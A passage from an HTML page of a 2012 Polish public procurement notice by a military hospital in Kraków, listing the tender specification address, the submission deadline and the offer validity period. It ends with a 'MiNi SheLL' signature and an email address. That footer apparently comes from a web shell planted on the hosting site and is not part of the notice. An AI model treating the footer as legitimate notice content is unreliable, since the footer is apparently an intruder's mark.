 innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.
w zakresie przewidzianym w § 3 ust. 7,9  umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką - Samodzielny Publiczny Zakład Opieki Zdrowotnej 30 - 901 Kraków, ul. Wrocławska 1-3...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2012 godzina 11:00, miejsce: Kancelaria Szpitala, (budynek komendy), ul. Wrocławska 1-3, 30 - 901 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com